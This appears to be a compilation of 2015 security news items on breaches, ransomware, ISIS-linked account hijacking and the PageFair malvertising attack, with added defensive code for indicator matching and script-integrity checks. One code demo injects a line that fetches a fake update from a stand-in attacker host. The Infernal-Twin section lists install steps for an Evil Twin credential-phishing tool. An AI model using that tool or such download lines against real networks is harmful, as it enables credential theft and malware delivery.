200,000 Comcast login credentials available on the Dark Web

During the weekend, nearly 590,000 Comcast email addresses and passwords were offered for sale on a black market in the dark web.
It is now the turn of Comcast: over the weekend nearly 590,000 Comcast email addresses and passwords were offered for sale on a black market in the dark web. As proof of the authenticity of the Comcast data, the seller published a list of 112 accounts, asking 300 USD for 100,000 accounts; the entire list of 590,000 accounts goes for 1,000 USD.

The sale was first discovered by the owner of the Twitter account @flanvel, who promptly contacted Salted Hash to report the news.

Comcast was in possession of the list and was checking the leaked data; it seems that of the 590,000 records offered for sale on the black marketplace, about 200,000 were still active.


Although they represent a minor part of the bulk data sold by the crooks, we cannot overlook the fact that the credentials offered could be used to take over the Comcast accounts.

According to the Comcast security team, the company's systems have not been compromised; every user who reports suspicious activity on their account will be contacted individually to resolve the issue.

It is likely that the data that is still active and valid comes from a collection assembled from other data breaches; the credentials are almost certainly recycled.

Online it is quite easy to find collections of data coming from malware-based attacks, data breaches and phishing campaigns. Unfortunately, users have the bad habit of reusing the same login credentials across different online services, so when one of them is compromised attackers can access all the others.

In this specific case, the list of Comcast login credentials had been circulating online since last week; it is likely someone decided to offer it for sale.

In summary, Comcast was not the victim of a data breach; the company has reset nearly 200,000 passwords after the customer list was discovered.

1-Click Way to Check If your Android Device is Vulnerable to Hacking

Vulnerabilities are common these days, and when we talk about mobile security, this year has been troubling for Android users. Almost every week we come across a new hack affecting Android devices.
One of the serious vulnerabilities is the Stagefright Security Bug, where all it needed to install malicious code on the Android devices was a simple text message.
Although Google patched these security holes in its latest Android update, manufacturers can take a long time to release their own updates, and it's even possible that older devices may not get the updates at all.
So, even after the release of patches for these critical vulnerabilities, it is difficult to say which Android devices are at risk of what bugs.
There is a one-click solution to this problem. One Android app can help educate you and let you know whether your device is at risk.
One-Click Solution to Check Your Device for All Critical Bugs
Android Vulnerability Test Suite (VTS), developed by mobile security firm NowSecure, is a free vulnerability scanner that scans your Android device for 22 known device vulnerabilities including Stagefright, potentially alerting you to any of the known issues.
This free, open source Android vulnerability scanner tool is "meant to show the end user the attack surface that a given device is susceptible to."
As NowSecure says on the VTS' Google Play listing, "In implementing these checks we attempt to minimize or eliminate both false positives [as well as] false negatives without negatively affecting system stability."
Note: Your antivirus product may flag this tool as malicious because it contains Stagefright detection code.
As VTS vulnerability scanner is an open-source project from a known and trusted developer, users and security researchers can file bugs or other issues on the GitHub repository.
How to Check your Android Device for All 22 Vulnerabilities?
This free Android vulnerability scanner app is available on Google Play Store, and its code is available on GitHub.
Install VTS for Android and hit the Search button when it appears to launch the Device Vulnerability Scanner.
After about 30 seconds, the Android vulnerability scanner will list all the vulnerabilities your device is vulnerable to.
I tested the app on my fully-patched OnePlus Two smartphone earlier this week and found my device is vulnerable to a few vulnerabilities, including the new variant of the Stagefright bug, Stagefright 2.0.

Cryptowall 4.0 comes from Russia, Bitdefender released a vaccine

Security experts at Bitdefender speculate that the newborn Cryptowall 4.0 has a Russian origin. The company released a vaccine software.
Security experts at Bitdefender seem to have no doubt: the authors of the latest variant of the popular Cryptowall ransomware, Cryptowall 4.0, are Russian. The experts came to this conclusion through evidence collected during their investigations; for example, the servers used to spam the threat are located in Russia, and the JavaScript used as a vector downloads the CryptoWall 4.0 payload from a Russian server.

The malware researchers also confirmed that the encryption algorithm used to encrypt the victim's files is the unbreakable AES-256, and that the key is encrypted using RSA-2048.

The Cryptowall 4.0 infections were observed across the world, including in France, Italy, Germany, India, Romania, Spain, US, China, Kenya, South Africa, Kuwait and the Philippines.


As observed for other threats coming from Russia, Russian users seem not to be targeted by the ransomware: Cryptowall 4.0 doesn't encrypt files if it detects that the computer is using the Russian language.

“Cryptowall 4.0 spam servers are located in Russia, according to The Javascript-written malware downloads the CriptoWall component from a Russian server.” states the post published by Bitdefender.
CryptoWall is a profitable instrument in the hands of criminal organizations: security researchers of the Cyber Threat Alliance conducted an investigation into the cybercriminal operations leveraging the CryptoWall 3.0 ransomware, discovering that the criminals behind the dreaded ransomware had already made $325 million.
The victims have two options: pay the ransom hoping to restore the encrypted documents, or wait for AV vendors to integrate the key used to encrypt their documents into their anti-ransomware solutions. Unfortunately, the latter is possible only if security experts seize one of the C&C servers used by the crooks and find on those machines the key used to encrypt the victims' files.

To hamper the diffusion of Cryptowall 4.0, Bitdefender has developed a tool that allows users to immunize their computers and block the file encryption process implemented by ransomware, including Cryptowall 4.0.

Be aware that if the PC is already infected with CryptoWall 4.0, the "vaccine" will not sanitize it.

The tool is not a complete antivirus solution, but it is a supplementary layer of protection that could increase the resilience of the machine to malware-based attacks.

The Infernal-Twin tool, easy hacking wireless networks

The Infernal-Twin is an automated tool designed for penetration testing activities; it has been developed to automate the Evil Twin attack.
The Infernal-Twin is an automated tool designed for penetration testing activities; it has been developed to assess wireless security by automating the Evil Twin attack.

“The tool was created to help the auditors and penetration testers to perform wireless security assessment in a quick manner and easing complex attack vectors.” states Khalilov M, the author.

Be aware that, as usually happens, a penetration testing tool could be misused by hackers to conduct illicit activities, so I decided to present it to raise awareness about this potential weapon in the arsenal of attackers.
Let us start by explaining the attack scenario. In an "Evil Twin" attack, the attacker sets up a bogus Wi-Fi access point purporting to provide wireless Internet service, while eavesdropping on the users' traffic.
The bogus access point is used to serve the users in the network fake login pages to steal their Wi-Fi credentials and other sensitive data. The scenario could also be exploited to run man-in-the-middle attacks or to serve malware to the computers in the targeted network.
First of all you need to install all the components necessary to use the tool, including the Apache web server, the MySQL database, the Scapy packet manipulation tool for computer networks and the wxtools framework.

Then you have to install the Aircrack-ng utility and get the infernal-twin from the repository.
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.

To install the components follow these steps

$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin

At this point launch the Infernal-Twin tool with superuser (root) privileges. Some users experienced problems connecting to the database; the user @lightos provided the following solution to fix the issue.

Create a new user on the database and use it for launching the tool by following this procedure:

Delete the dbconnect.conf file from the Infernal wireless folder.
Run the following commands from your mysql console:
mysql> use mysql;
mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root2'@'localhost' WITH GRANT OPTION;
Try to run the tool again.
Note that this grants the new account full privileges on every database, including the right to grant them to others; on a machine used for anything besides the tool, scope the grant to the tool's own database instead.
The Infernal-Twin tool implements several features; it provides everything necessary to hack a wireless network (WPA2, WEP) and easily allows running wireless social engineering attacks. Below are the principal features:

GUI Wireless security assessment SUIT
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
Probe Request
The author of the Infernal-Twin hacking tool, Khalilov M, aka 3ntr0py (entropy1337), announced that next releases will include parsing t-shark log files for gathering victim’s credentials and other data.

The following video illustrates an attack on a public network; the script should be able to modify the login page and alter its content with the necessary variables.

Below is another video tutorial on the Infernal-Twin tool.

If you are interested in wireless hacking for penetration testing, also take a look at WiFiPhisher, a Wi-Fi social engineering tool that allows an attacker to steal credentials from users of secure Wi-Fi networks.

WiFiPhisher was developed by the Greek security expert George Chatzisofroniou and is available for download on the software development website GitHub.

British NCA revealed to have hacking abilities, aka equipment interference

Documents published by the UK Government reveal that the UK's National Crime Agency has hacking capabilities, so-called equipment interference.
We have long debated the hacking capabilities of the principal law enforcement and intelligence agencies.

Many documents leaked by the whistleblower Edward Snowden revealed that the UK intelligence agency GCHQ has the ability to compromise practically every target, exactly like its American cousin, the NSA.

Now, for the first time, the technological abilities of the UK's National Crime Agency (NCA) have been revealed in a collection of documents: the British law enforcement agency has "equipment interference" (EI) capabilities, which allow it to hack into mobile devices and computers.


Last week, the UK government published the draft Investigatory Powers Bill, a contested piece of proposed legislation that would force internet service providers to store the internet browsing history of all citizens for up to one year.

Eric King, deputy director of Privacy International, who analyzed the document, noticed that one section contains an explicit reference to UK law enforcement having the capability to conduct "equipment interference."

“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”

The document "Factsheet: Targeted Equipment Interference", published by the UK government a few days ago, provides further information on the equipment interference capabilities available to the National Crime Agency.

[The Equipment interference is] “the power to obtain a variety of data from equipment. This includes traditional computers of computer-like devices such as tablets, smart phones, cables, wires and static storage devices.”
Equipment interference, also known as "computer network exploitation," has different levels of complexity. The agents of the National Crime Agency can use it to infect computers or to remotely deploy spyware on mobile devices.

[Sophisticated equipment interference] allows the NCA "remotely installing a piece of software on to a device," the document reads. "The software could be delivered in a number of ways and then be used to obtain the necessary intelligence." "Equipment interference capabilities have made a vital contribution to the UK from Islamist terrorism and have also enabled the disruption of paedophile-related crime."
According to experts, there is little doubt that these practices could more simply be described as hacking.

The security researcher Claudio Guarnieri commented to Motherboard on the equipment interference capabilities of the British law enforcement agency.

"However you put it, and regardless of 'interference,' it clearly speaks of equipment, so it most certainly isn't referring to any sort of passive wiretapping. And the only thing you can do to equipment is, well, hack it," explained Guarnieri. "This appears to confirm for the very first time that British law enforcement are in the hacking business," added King from Privacy International. "What statutory authority are the police claiming grants them these powers? How often have they been used? Has hacked material been used in criminal prosecutions? Have courts been notified evidence presented before them might have been tampered with by hacking?" King added.

ISIS Supporter Hacks 54,000 Twitter Accounts and Posts Details of Heads of the CIA and FBI

ISIS hackers have hacked tens of thousands of Twitter accounts, including the accounts of members of the CIA and the FBI, in revenge for the US drone strike that killed a British ISIS extremist in August.
The Cyber Caliphate, a hacker group set up by British ISIS member Junaid Hussain, urged its supporters and followers to hack Twitter accounts in order to take revenge for Hussain's death.
Over 54,000 Twitter Accounts Hacked!
As a result, the hackers were able to hack more than 54,000 Twitter accounts. Most of the victims targeted by the jihadis appear to be based in Saudi Arabia, though some of them are British.
One of the victims based in Saudi Arabia, whose Twitter account was compromised by the ISIS extremists, said, "I am horrified at how they got hold of my details."
The extremists not only hacked thousands of Twitter accounts, but they also posted hacked personal information, including phone numbers and passwords, of the heads of:
The Central Intelligence Agency (CIA)
The Federal Bureau of Investigation (FBI)
The United States' National Security Agency (NSA)
'We Are Back with a BANG'
Hussain was a British hacker who rose to prominence within Islamic State Terrorist group (better known as ISIS) in Syria as a top cyber expert to mastermind the ISIS online war before a US drone killed him in August.
After Hussain's death, Cyber Caliphate (@cyber_caliph), which took control of the official Twitter and YouTube accounts of the US military's Central Command (CENTCOM) in January, reappeared on Twitter last Sunday.
"We are back," Cyber Caliphate declared in an opening tweet.
Before its accounts got suspended by Twitter, Cyber Caliphate tweeted a link to the database that contained stolen Twitter accounts, including passwords, although the data could not be verified yet.
The incident came just a day after another hacking group, Crackas With Attitude (CWA), claimed to have gained access to a Law Enforcement Portal that contains arrest records and tools for sharing information about terrorist events and active shooters.

Threat actors hacked the popular Touchnote company

On 4th November 2015, the Touchnote company received information confirming that it had been the victim of a data breach that exposed customer data.
Data breaches are becoming a daily event; the latest to make the headlines is the hack suffered by the Touchnote postcard app.

Hackers have stolen customer data from the database of Touchnote, the popular app used to create postcards from pictures taken by the users. The app is very popular because it comes pre-installed on millions of handsets; nearly 4 million postcards have been sent via the Touchnote app since it was launched in 2008.

The company has already informed its customers via email; according to the official statement issued by Touchnote, hackers accessed users' personal information, including names, email and home addresses.

“On 4th November 2015 we received information confirming that Touchnote has been the victim of criminal activity, resulting in the theft of some of our customer data.

The data that was accessed included your name, email address, postal address and your Touchnote order history, registered with Touchnote does not store your full credit/debit card number, expiry date or security code. Therefore, this information was not accessed.

The data that was accessed included the last four digits of your card number (e.g. XXXX XXXX XXXX 1234) which on its own cannot be used for making financial transactions." states the email.


The company informed its customers that it is supporting the investigation conducted by the UK's National Cyber Crime Unit; at the time of writing there is no news regarding the real number of affected users.

The company highlighted that financial data was not exposed by the breach: the hackers obtained only the last four digits of customer card numbers, and the firm clarified that it doesn't store full card information (card numbers, expiration dates or security codes).

Touchnote stored passwords in an encrypted format; it is nonetheless recommending that customers change them.

“None of the data that may have been accessed is financially sensitive,” Touchnote said.

The company announced an improvement of its security measures.

Touchnote users are invited to carefully read the Q&A page published on the company website, other info will be provided via Twitter.

Cyber Caliphate Hacks 54k Twitter accounts, including ones of CIA and FBI officials

The ISIS group known as the Cyber Caliphate hacked 54,000 Twitter accounts and leaked online data of heads of the CIA and FBI.
We have discussed the cyber capabilities of ISIS sympathizers several times; recently Mikko Hyppönen, Chief Research Officer at F-Secure, said he worries about cyber extremists that could penetrate critical infrastructure and cause serious damage.

The expert explained that ISIS is probably the first terrorist group with hacking capabilities sufficient to manage a major attack against government infrastructure, and the situation is getting worse because the group is becoming more aware of the effectiveness of an offensive launched through cyberspace.

Now ISIS hackers are in the headlines once again: the collective known as the Cyber Caliphate has hacked tens of thousands of Twitter accounts, including accounts belonging to several members of the CIA and the FBI, in revenge for the US drone strike that killed the British jihadist hacker Junaid Hussain in August.

“Jihadis have hacked tens of thousands of Twitter accounts in retaliation for the drone attack that killed a British Islamic State extremist. A group called Cyber Caliphate, set up by Junaid Hussain from Birmingham, urged its followers to take control of the accounts to spread IS propaganda. Most of the victims appear to be based in Saudi Arabia, though some are feared to be British. In what experts described as a worrying escalation of the global cyber war, details of more than 54,000 Twitter accounts, including passwords, were posted online last Sunday.” reported the DailyMail.

Intelligence analysts believe that the Cyber Caliphate is a group of hackers directly linked to the ISIS terrorist organization and that Junaid Hussain was one of its founders.
The Cyber Caliphate carries out hacking operations and propaganda on the Internet; it incites supporters and followers to hack Twitter accounts of Western government and military organizations in order to avenge the death of their brother.
The hackers hijacked more than 54,000 Twitter accounts, most of which belong to users in Saudi Arabia. The hackers of the Cyber Caliphate leaked the victims' personal information online, including phone numbers and passwords, exposing them to serious risks.

“I am horrified at how they got hold of my details.” said one of the victims.
Among the victims of the Cyber Caliphate there are senior officials of the Central Intelligence Agency (CIA), the Federal Bureau of Investigation (FBI), and the United States' National Security Agency.

“We are back,” Cyber Caliphate declared via Twitter through an account that has been already suspended.

In May, the hackers of the Cyber Caliphate published a video threatening crippling cyber attacks against Europe, the United States and Australia. The terrorists claimed to have the cyber capabilities necessary to spy on Western communications.

“The electronic war has not yet begun,” the pro-ISIS hackers boasted in their latest video threatening the cyberattacks.
The group, which was involved in the hijacking of social media accounts belonging to US CENTCOM, released a propaganda video threatening cyberattacks, anticipating the terrorists' operations on the Internet.

“Praise to Allah, today we extend on the land and in the internet. We send this message to America and Europe. We are the hackers of the Islamic State and the electronic war has not yet begun,” the video said with a distorted voice and picture of an Anonymous member. “What you have seen is just a preface of the future. We are able until this moment to hack the website of the American leadership and the website of the Australian airport and many other websites.”

What is Threat Intelligence and How It Helps to Identify Security Threats

Simply put, threat intelligence is knowledge that helps you identify security threats and make informed decisions. Threat intelligence can help you solve the following problems:
How do I keep up to date on the overwhelming amount of information on security threats…including bad actors, methods, vulnerabilities, targets, etc.?
How do I get more proactive about future security threats?
How do I inform my leaders about the dangers and repercussions of specific security threats?
Threat Intelligence: What is it?
Threat intelligence has received a lot of attention lately. While there are many different definitions, here are a few that get quoted often:
Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard. – Gartner
The set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators – SANS Institute
Why is everyone talking about it?
Verizon’s 2015 DBIR estimated a financial loss of $400 million from 700 million compromised records, which resulted from 79,790 security incidents!
As long as security threats and breaches occur, every business will look for ways to protect their data. The threat landscape is always changing and the business risk is increasing because of our dependence on IT systems.
Threats come from internal as well as external sources. Bottom line is, organizations are under tremendous pressure to manage threats. Though information in the form of raw data is available abundantly, it is hard and time-consuming to get meaningful information based on which proactive measures can be set.
This naturally pulls more and more users towards threat intelligence as it helps to prioritize threats within the deluge of data, alerts, and attacks and provides actionable information.
The table below presents several common indicators of compromise that can be identified with threat intelligence feeds, each paired with an example of what a hit on it typically reveals:

Indicators of compromise: IP addresses; domain names
Example: Malware infections targeting internal hosts that are communicating with known bad actors

Indicators of compromise: Sender's email address and email subject
Example: Phishing attempts where internal hosts click on an unsuspecting email and "phone home" to a malicious command and control server

Indicators of compromise: Filenames and file hashes (e.g. MD5); registry keys; dynamic link libraries (DLLs); mutex names
Example: External attacks from hosts that might be infected themselves or are already known for nefarious activity
Threat Intelligence capabilities
Attacks can be broadly categorized as user based, application based and infrastructure based threats. Some of the most common threats are SQL injections, DDoS, web application attacks and phishing.
It is important to have an IT security solution that provides threat intelligence capabilities to manage these attacks by being both proactive and responsive.
Attackers are constantly changing their methods to challenge security systems. Therefore, it becomes essential for organizations to get threat intelligence from a variety of sources.
One of the proven methods to stay on top of attacks is to detect and respond to threats with a SIEM (Security Information & Event Management system).
A SIEM can be used to track everything that happens in your environment and identify anomalous activities. Isolated incidents might look unrelated, but with event correlation and threat intelligence, you can see what is actually happening in your environment.
Nowadays, IT security professionals must operate under the assumed breach mentality. Comparing monitored traffic against known bad actors sourced from threat intelligence would help in identifying malicious activities.
However, doing this manually is time-consuming. Integrating indicator-based threat intelligence into a SIEM solution helps identify compromised systems and can possibly even prevent some attacks.
Best Practices
Integrating threat intelligence and responding to attacks is not enough to combat the ever-changing threat landscape. You need to analyze the situation and determine threats you are likely to face, based on which you can come up with precautionary measures.
Here is a list of several best practices:
Have an application whitelist and blacklist. This helps prevent the execution of malicious or unapproved programs, including .DLL files, scripts and installers.
Check your logs carefully to see if an attempted attack was an isolated event, or if the vulnerability had been exploited before.
Determine what was changed in the attempted attack.
Audit logs and identify why this incident happened – reasons could range from system vulnerability to an out-of-date driver.
What a threat intelligence-enabled SIEM will solve
A SIEM, like SolarWinds Log & Event Manager, collects and normalizes log data from monitored traffic and automatically tags suspicious events.
With an integrated threat intelligence mechanism and built-in rules, the monitored events can be compared against a constantly updated list of known bad actors.
You can quickly search & monitor for hits from the bad actors against the log data in real time and identify common indicators of compromise.
You can automatically respond with actions like blocking known bad IP addresses, in case of malicious attack attempts.
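The indicator matching described in the table and in the SIEM paragraphs above, as an added example that is not SolarWinds code or part of the original article: a small matcher that normalises log values (case, trailing DNS dots), compares them against a constructed indicator feed, attaches the automatic response a rule would trigger, and counts repeated contact with the same bad actor so an isolated event can be told from a recurring one. The feed entries, log format and log lines are all constructed for the example.

```python
"""Indicator-of-compromise matching over normalised log events (added example).
All feed entries and log lines below are constructed; none are real indicators."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed threat-intelligence feed. Indicator types mirror the table above;
# every value is stored in canonical form (lower case, no trailing dot).
THREAT_FEED = {
    "ip": {"198.51.100.23", "203.0.113.77"},            # RFC 5737 documentation addresses
    "domain": {"update-check.example", "cdn-static.example"},
    "email_sender": {"billing@payroll-notice.example"},
    "file_hash": {"d41d8cd98f00b204e9800998ecf8427e"},  # MD5 of an empty file, placeholder
    "mutex": {"global\\examplemutex_1337"},
}

# Which log field carries which indicator type, and the automatic response a SIEM
# rule would trigger on a hit (the "block known bad IP" style of action described above).
FIELD_MAP = {
    "dst_ip": ("ip", "block outbound traffic to {ind} at the firewall"),
    "query": ("domain", "sinkhole {ind} and review the DNS history of the host"),
    "from": ("email_sender", "quarantine mail from {ind} and warn recipients"),
    "md5": ("file_hash", "isolate host and quarantine the file with hash {ind}"),
    "mutex": ("mutex", "isolate host; mutex {ind} is a known malware marker"),
}


@dataclass
class Event:
    ts: str
    host: str
    kind: str
    fields: dict


@dataclass(frozen=True)
class Hit:
    ts: str
    host: str
    indicator_type: str
    indicator: str
    response: str


_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def normalise(indicator_type: str, value: str) -> str:
    """Bring a raw log value into the feed's canonical form so comparisons are exact."""
    value = value.strip().strip('"').lower()
    if indicator_type == "domain":
        value = value.rstrip(".")  # DNS logs often record the FQDN with a trailing dot
    return value


def parse_event(line: str) -> Event:
    """Parse one constructed 'timestamp key=value ...' log line into an Event."""
    ts, _, rest = line.strip().partition(" ")
    fields = {k: v.strip('"') for k, v in _KV.findall(rest)}
    return Event(ts=ts, host=fields.pop("host", "?"), kind=fields.pop("kind", "?"), fields=fields)


def match_event(event: Event, feed=THREAT_FEED) -> list[Hit]:
    """Compare every indicator-bearing field of the event against the feed."""
    hits = []
    for field_name, (ind_type, action) in FIELD_MAP.items():
        raw = event.fields.get(field_name)
        if raw is None:
            continue
        ind = normalise(ind_type, raw)
        if ind in feed.get(ind_type, ()):
            hits.append(Hit(event.ts, event.host, ind_type, ind, action.format(ind=ind)))
    return hits


def analyse(lines, feed=THREAT_FEED):
    """Return all hits plus a count per (host, indicator) pair, so repeated contact with
    the same bad actor stands out from an isolated event, as the best practices above advise."""
    hits = [h for line in lines if line.strip() for h in match_event(parse_event(line), feed)]
    repeats = Counter((h.host, h.indicator) for h in hits)
    return hits, repeats


# Constructed sample log: one benign connection (192.0.2.10) among indicator hits.
SAMPLE_LOG = """\
2015-11-06T10:01:02Z host=ws-12 kind=conn dst_ip=198.51.100.23 dst_port=443
2015-11-06T10:01:05Z host=ws-12 kind=dns query=Update-Check.EXAMPLE.
2015-11-06T10:02:00Z host=mail01 kind=mail from=Billing@payroll-notice.example subject="Invoice overdue"
2015-11-06T10:05:00Z host=ws-07 kind=file md5=D41D8CD98F00B204E9800998ECF8427E name=setup.exe
2015-11-06T10:06:00Z host=ws-07 kind=conn dst_ip=192.0.2.10 dst_port=80
2015-11-06T10:07:00Z host=ws-12 kind=conn dst_ip=198.51.100.23 dst_port=443
""".splitlines()

if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for h in found:
        print(f"{h.ts} {h.host}: {h.indicator_type}={h.indicator} -> {h.response}")
    for (host, ind), n in counts.items():
        if n > 1:
            print(f"repeat: {host} contacted {ind} {n} times")
```

Real feeds change constantly, so in practice THREAT_FEED would be refreshed from the vendor's source on a schedule rather than embedded as a constant.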
Watch how threat intelligence works in a SIEM and download your free trial of a leading SIEM from SolarWinds.

Hackers have Hacked into US Arrest Records Database

The group of teenage hackers, which previously hacked into the personal email of CIA director John Brennan and published a large trove of sensitive data, has now got its hands on an even more important and presumably secure target.
Hackers Accessed Law Enforcement Private Portal
The hacking group, Crackas With Attitude (CWA), claims it has gained access to a Law Enforcement Portal through which one can access:
Arrest records
Tools for sharing information about terrorist events and active shooters
The system in question is reportedly known as the Joint Automated Booking System (JABS), which is only available to the Federal Bureau of Investigation (FBI) and law enforcement.
Hackers Gained Access to FBI's Real-Time Chat System
Moreover, the hacking group also says it has gained access to another tool that is something like a real-time chat system for the FBI to communicate with other law enforcement agents around the US.
Two days ago, CWA published a portion of the data it collected to Pastebin and Cryptobin, apparently releasing names, email addresses, and phone numbers of around 3,500 law enforcement and military personnel.
JABS System Hacked!
However, the group has also been able to get its hands on many law enforcement tools that contain more sensitive information, and Wired verified that a screenshot of JABS shared by CWA was legitimate.
The CWA hackers told Wired they found a vulnerability that allowed them to gain access to the private law enforcement portal, giving the group access to dozens of law enforcement tools, but the hackers didn't reveal anything about the vulnerability.
This system is noteworthy as it may allow anyone with access to view arrest records, even when the arrests are sealed or not available to the public.
It means, among other things, that this system can expose secret informants and others who have been detained but are now working with law enforcement agencies.
Although none of the information from these law enforcement tools has been shared publicly, the hacking group could cause trouble for government officials by releasing the sensitive information at any time.

Malvertising attack hit The Economist, anti-ad blocking service PageFair hacked

PageFair, the anti-ad blocking analytics service used by The Economist, was hacked on Halloween and the attackers used it to serve malware.
On Halloween, hackers compromised the anti-ad blocking service PageFair used by The Economist, exposing readers to malware infections.
PageFair allows publishers to measure how many visitors block their ads; users who visited The Economist's website from October 31 to the early hours of November 1 may have installed a keylogger disguised as an Adobe update onto their machines.
“On Oct. 31, 2015, one of economist.com’s vendors, PageFair, was hacked. If you visited economist.com at any time between Oct. 31, 23:52 GMT and Nov. 1, 01:15 GMT, using Windows OS and you do not have trusted anti-virus software installed, it is possible that malware, disguised as an Adobe update, was downloaded onto your PC. If you accepted what looked like an Adobe update when you visited economist.com,” states a security advisory published by The Economist.

The Economist hired a security firm to investigate the attack; the experts confirmed that the malware used by the threat actors is a Windows keylogger, so the attackers were likely after visitors’ personal data, including login credentials.

The Economist confirmed that its own systems were not compromised; the attackers instead abused the third-party anti-ad blocking service PageFair.

Charles Barber, a spokesperson for the publication, told Quartz that, according to data provided by PageFair, only a limited number of visitors were infected.

PageFair confirmed that its analytics network was abused to serve the malware for about 83 minutes: the malvertising attack was discovered after five minutes, but the company needed more than an hour to halt it.

“It is now six days since one of our CDNs was compromised for 83 minutes by a hacker. We have worked hard this week to analyse and disclose what happened to our clients and the world. Thanks to the cooperation of the NanoCore author and the dynamic DNS service Dyno, whatever access the hacker had to infected computers was shut down on Tuesday. In addition, for the last 4 days over 90% of antivirus tools (by market share) are detecting and cleaning the malware.” states PageFair in an official statement. “If you are a publisher using our free analytics service, you have good reason to be very angry and disappointed with us right now,” PageFair CEO Sean Blanchfield told MediaPost. “The attack was sophisticated and specifically targeted against PageFair, but it is unacceptable that the hackers could gain access to any of our systems.”

The Economist is just one of the 501 publishers affected by the security breach; 2.3% of their visitors were placed at risk.

The Economist provided the following suggestions to its readers:

Change your passwords on all systems
Contact your financial providers and check bank and credit card statements for unusual activity
Run anti-virus software from a reputable provider. We recommend the following:
Windows Defender (if you have Windows 10 or 8.1)
Microsoft Security Essentials (if you have Windows 7 or Windows Vista)
Avast (free)
Malwarebytes (free)
Download and install the tool.
Run a full system scan.
The malware should be identified and removed.
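A publisher cannot audit a vendor's CDN, but it can refuse to execute a script whose bytes have changed. The following Go program is an editor's illustration added here, not code from PageFair, The Economist or the investigators: it computes the Subresource Integrity (SRI) value a publisher would pin in its script tag and applies the verification rule a browser uses (unknown algorithms ignored, strongest known algorithm wins, any matching digest of that strength passes). The script body, the CDN hostname and the injected line are constructed stand-ins. The practitioner's caveat is the one PageFair's own service model implies: a pinned hash breaks every time the vendor legitimately updates the script, so SRI only fits third-party code whose versions the publisher controls deliberately.

```go
package main

import (
	"crypto/sha256"
	"crypto/sha512"
	"crypto/subtle"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// ComputeSRI returns the value a browser compares against a script tag's
// integrity attribute: "<alg>-<base64 digest of the exact bytes served>".
func ComputeSRI(alg string, body []byte) (string, error) {
	var digest []byte
	switch alg {
	case "sha256":
		d := sha256.Sum256(body)
		digest = d[:]
	case "sha384":
		d := sha512.Sum384(body)
		digest = d[:]
	case "sha512":
		d := sha512.Sum512(body)
		digest = d[:]
	default:
		return "", errors.New("unsupported SRI algorithm: " + alg)
	}
	return alg + "-" + base64.StdEncoding.EncodeToString(digest), nil
}

// VerifySRI applies the browser's rule to an integrity attribute holding one or
// more whitespace-separated "<alg>-<digest>" tokens: tokens with unknown
// algorithms are ignored, only the strongest known algorithm is considered, and
// the body passes if it matches any token of that strength.
func VerifySRI(integrity string, body []byte) (bool, error) {
	strength := map[string]int{"sha256": 1, "sha384": 2, "sha512": 3}
	best := 0
	var candidates []string
	for _, tok := range strings.Fields(integrity) {
		alg, _, ok := strings.Cut(tok, "-")
		s, known := strength[alg]
		if !ok || !known {
			continue
		}
		if s > best {
			best, candidates = s, candidates[:0]
		}
		if s == best {
			candidates = append(candidates, tok)
		}
	}
	if best == 0 {
		return false, errors.New("integrity attribute lists no supported algorithm")
	}
	for _, tok := range candidates {
		alg, _, _ := strings.Cut(tok, "-")
		want, err := ComputeSRI(alg, body)
		if err != nil {
			return false, err
		}
		if subtle.ConstantTimeCompare([]byte(want), []byte(tok)) == 1 {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	// Constructed stand-in for a vendor analytics script; not PageFair's code.
	served := []byte("(function(){window.pf={ping:function(){}}})();\n")
	tag, _ := ComputeSRI("sha384", served)
	fmt.Println(`<script src="https://cdn.example.invalid/pf.js" integrity="` + tag + `" crossorigin="anonymous"></script>`)
	// The same tag with one injected line: the browser refuses to run it.
	tampered := append(append([]byte{}, served...), []byte("location='http://evil.invalid/AdobeUpdate.exe';\n")...)
	ok, _ := VerifySRI(tag, tampered)
	fmt.Println("tampered body accepted:", ok)
}
```

The `crossorigin="anonymous"` attribute matters in practice: without a CORS-enabled fetch the browser cannot read the response body to hash it and treats the script as failed.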

Linux ransomware already infected at least tens of users

Researchers at the Russian antivirus company Doctor Web have discovered a Linux ransomware that has already infected at least tens of users.
Ransomware is a profitable instrument in the criminal ecosystem; security experts discover new variants on a weekly basis. This week a new variant of CryptoWall, CryptoWall 4.0, appeared in the wild, while an offline ransomware is targeting Russian users.

The news of the day is that researchers at Doctor Web have spotted a new file-encrypting ransomware, dubbed Linux.Encoder.1, that targets Linux systems. It is estimated that tens of users have already fallen victim to it.

“Doctor Web warns users about new encryption ransomware targeting Linux operating systems. Judging from the directories in which the Trojan encrypts files, one can draw a conclusion that the main target of cybercriminals is website administrators whose machines have web servers deployed on them. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan.” states the blog post published by Doctor Web.

The Linux ransomware is written in C and leverages the PolarSSL library; it launches itself as a daemon that encrypts data and deletes the original files from the system.

The Linux ransomware requires administrator privileges to run. Once a machine is infected, the malware downloads the files containing the attackers’ demands and a file containing the path to a public RSA key. The ransomware runs as a daemon and deletes the original files; the RSA public key is used to wrap the AES keys that encrypt the files, so the wrapped keys can be stored alongside the encrypted data.

